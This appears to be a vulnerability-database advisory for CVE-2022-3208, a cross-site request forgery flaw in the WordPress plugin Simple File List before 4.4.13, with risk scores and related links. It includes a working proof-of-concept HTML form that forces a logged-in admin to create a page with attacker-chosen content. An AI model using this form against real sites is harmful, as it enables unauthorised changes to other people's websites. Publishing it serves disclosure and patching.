Lucene search
Raad Haddad of Cloudyrion GmbHWPEX-ID:80D475CA-B475-4789-8EEF-9C4D880853B7HistorySep 19, 2022 - 12:00 a.m.
Simple File List < 4.4.13 - Page Creation via CSRF
2022-09-1900:00:00
Raad Haddad of Cloudyrion GmbH
86
0.001 Low
EPSS
Percentile
26.5%
The plugin does not implement nonce checks, which could allow attackers to make a logged in admin create new page and change it’s content via a CSRF attack.
<html>
<body>
<form action="https://example.com/wp-admin/admin.php" method="POST">
<input type="hidden" name="eeShortcode" value="Page Content" />
<input type="hidden" name="eeCreatePostType" value="Page" />
<input type="hidden" name="eeGo" value="Go" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>Related
nvd
nvd
CVE-2022-3208
2022-10-10 21:15:11
prion
prion
Cross site request forgery (csrf)
2022-10-10 21:15:00
cve
cve
CVE-2022-3208
2022-10-10 21:15:11
cnvd
cnvd
WordPress Simple File List cross-site request forgery vulnerability
2022-10-12 00:00:00
patchstack
patchstack
wpvulndb
wpvulndb
Simple File List < 4.4.13 - Page Creation via CSRF
2022-09-19 00:00:00
cvelist
cvelist
CVE-2022-3208 Simple File List < 4.4.13 - Page Creation via CSRF
2022-10-10 00:00:00